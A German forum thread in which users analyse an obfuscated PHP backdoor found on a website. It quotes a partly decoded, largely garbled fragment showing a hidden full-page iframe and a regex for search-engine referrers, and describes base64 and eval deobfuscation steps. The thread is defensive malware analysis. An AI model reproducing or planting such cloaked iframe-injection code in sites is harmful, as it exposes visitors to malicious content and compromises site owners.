PHP Backdoor(?) - Was tut dieses Script

• Thread starter Thread starter Deleted member 11691
  • Start date Start date
D

Deleted member 11691

Guest
Hier einige Parts halbwegs entschlüsselt - das jetzt sauber zu machen, kostet mir zu viel Zeit: http://dontrm.org/e93de2458279f322b58b712c10eaea7a

Auf jeden Fall was mit cURL, iframes und User Agents und IPs von u.A. Suchmaschinen. Ich würde dem nicht trauen, ich vermute es handelt sich hier um ein Script, welches einen iframe in Websites einfügt, wenn der Besucher von einer Suchmaschine aus auf die Seite kommt o.Ä.

Kann man alleine aufgrund dieser Zeile vermuten:

Code:
~éܶ*'º&€®¶²str_splitfile_put_contentsÊƱ™¥±•}•Ñ}½¹Ñ•¹ÑÌrbÑT•‘T—ÐQ…4U%dU%ôDE ñ‘¥Ø…±¥¸ô‰•¹Ñ•ÈˆÍÑå±”ô‰Ñ•áе…±¥¸è•¹Ñ•ÈìÝ¥‘Ñ*è€ÄÀÀ”ì¡•¥¡Ðè€ÌÀÀÁÁà쉅*ɽչµ½±½ÈèÝ¡¥Ñ”ìÁ½Í¥Ñ¥½¸èÉ•±…Ñ¥Ù”ìèµ¥¹‘•àè€äääääääìѽÀè€ÁÁà챕™Ðè€ÁÁàìˆø4(ñ¥™É…µ”ÍÉŒôˆ" scrolling="yes" height="100%" width="100%" frameborder="0"  allowtransparency="false" allowfullscreen="true" allowscriptaccess="always"></iframe></div>
<div style="visibility: hidden; position: absolute;  top: -9999px;">óÆ&öG’…Ç2¥µãåÒ¢“óâöñ‰½‘äø¼ñp½‰½‘äø½¤</div></body>7W&Åö–æ—FÆÆ÷u÷W&Åöf÷Væ'’6W'fW"6öö¶–P/(ru|ua)/i'’66WBÆæwVvRõõµÇ2Ó÷'Röby useragent languagecachežHØXÚH™XY[™Áñ¡ÑÑÀép½p¼¡myp½t¬¥p½ñ‰äÍÑÉ…¹”É•™•É•È¼¡Ù•É¥é½¹p¹ñ‰…¥‘Õp¹ñ‰Ñp¹ñ½µ…ÍÑp¹ñ½½±•p¹ñµÍ¹p¹ñ‰¥¹p¹ñ±¥Ù•p¹ñå…¡½½p¹ñ…½±p¹ñ…Í*p¹½ñ…Í*p¹½µñÍ•…É¡…¹‘¥Ù•ñ…±½Ñp¹½µñ½É…¹•p¹½p¹Õ*ñÑÝ¥ÑÑ•Ép¹½µñ…±±Ñ¡•Ý•‰p¹½µñ±½½*͵…ÉÑp¹½µñ…±Ñ…Ù¥ÍÑ…p¹½µñÍ•p¹™¥É•‰…±±p¹‘•ñÍ•…É¡p¹±å½Íp¹½µñÍÕ¡•p¹±å½Íp¹‘•ñå…¹‘•áp¹ÉÕñå…p¹ÉÕñÉ…µ‰±•Ép¹ÉÕñ¥Åp¹½µñÅ¥Áp¹ÉÕñµ…¥±p¹ÉÕñÁ½¥Í*p¹ÉÕñ‘…•µ½¸µÍ•…É¡p¹½µñ…Á½ÉÑp¹ÉÕñÍ•…É¡p¹Õ*Ép¹¹•Ññ¹¥µ…p¹ÉÕñÝ•‰…±Ñ…p¹ñÍ•…É¡p¹‰¥µ¥Ép¹¹•Ññµ•Ñ…p¹Õ„¤½¥‰ä¹½ÐMÉ•™•É•È![\&\?](?:q|query|p|wd|qt|su|text|z|r|search_query)=
PS: Achja, auf einen Profi deutet so ein Script nie hin - immer Skiddy. ;) Wobei es in diesem Fall schon relativ mühsam verschlüsselt wurde.

Last edited by a moderator:
Ziemlich Zeitaufwändig das zu "deobfuscten"

Nach einem Austausch von eval durch echo ergab sich:
http://pastebin.com/tJauAGie

Nun habe ich mir ein Teil heraus gesucht:

Code:
echo "ZnVuY3==" | base64 -d

das ergab:

Code:
func

teil eines PHP Befehls function

so musst du weiter verfahren, oder anderweitig (Sandbox,etc) weiterhelfen.

Meine persönliche Einschätzung ist, dass es nicht vom Kunden stammt.

Hallo,

vielen Dank, its, für den Tipp. Versuche nun gerade die obfuscated functions in richtige functions auszutauschen. Ist so, dass im 1. Base64-Teil die Variablen in Funktionen bestückt werden ($blablabla=function($irgendwas)) und im 2. Base64-Teil diese Variablen benutzt werden. Vielen Dank für den Ansatz!

Back